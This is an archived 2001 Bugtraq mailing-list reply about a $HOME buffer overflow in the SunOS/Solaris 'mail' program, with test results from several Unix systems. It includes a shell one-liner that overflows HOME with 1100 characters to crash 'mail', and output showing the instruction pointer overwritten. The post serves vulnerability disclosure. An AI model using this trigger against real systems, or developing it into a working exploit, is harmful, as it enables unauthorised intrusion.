Home page logo

bugtraq logo Bugtraq mailing list archives

Re: $HOME buffer overflow in SunOS 5.8 x86
From: Gunnar Wolf <gwolf () campus iztacala unam mx>
Date: Tue, 5 Jun 2001 13:54:11 -0500 (CDT)

On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
$HOME buffer overflow in SunOS 5.8 x86
Systems affected:
SunOS 5.8 x86 have not tested on other OSes
Risk: Medium
Date: 4 June 2001

HOME=`perl -e 'print "A"x1100'` ; export HOME
mail a
eip gets smashed with 0x41414141.

0:jpmeier () sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME
0:jpmeier () sol:/home/jpmeier> mail a
^Cmail: Mail saved in dead.letter
1:jpmeier () sol:/home/jpmeier> uname -a
SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10

also tried larger buffers.

Solaris/sparc appears not vulnerable. Maybe its an x86 bug only

Solaris 7/Sparc is vulnerable:

[gwolf () sun gwolf]$ uname -a
SunOS sun.mydomain.org 5.7 Generic_106541-16 sun4u sparc SUNW,Ultra-5_10
[gwolf () sun gwolf]$ HOME=`perl -e 'print "A"x1100'` ; export HOME
[gwolf () sun gwolf]$ mail a
^Cmail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10

Digital Unix V4.0C is vulnerable:

digital> uname -a
OSF1 digital V4.0 564.32 alpha
digital> setenv HOME `perl -e 'print "a"x1100'`
Received disconnect: Command terminated on signal 6.

[and I am logged out of the machine]

I tested it also on OpenBSD 2.8/i386 and /sparc, RedHat Linux 6.1/alpha
and Debian GNU/Linux 2.2r3/i386, and they are not vulnerable.

Gunnar Wolf - gwolf () campus iztacala unam mx - (+52)5623-1119
Desarrollo y Admon. de Sistemas en Red - FES Iztacala - UNAM
Departamento de Seguridad en Computo   -   DGSCA    -   UNAM
Quidquid latine dictum sit, altum viditur.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]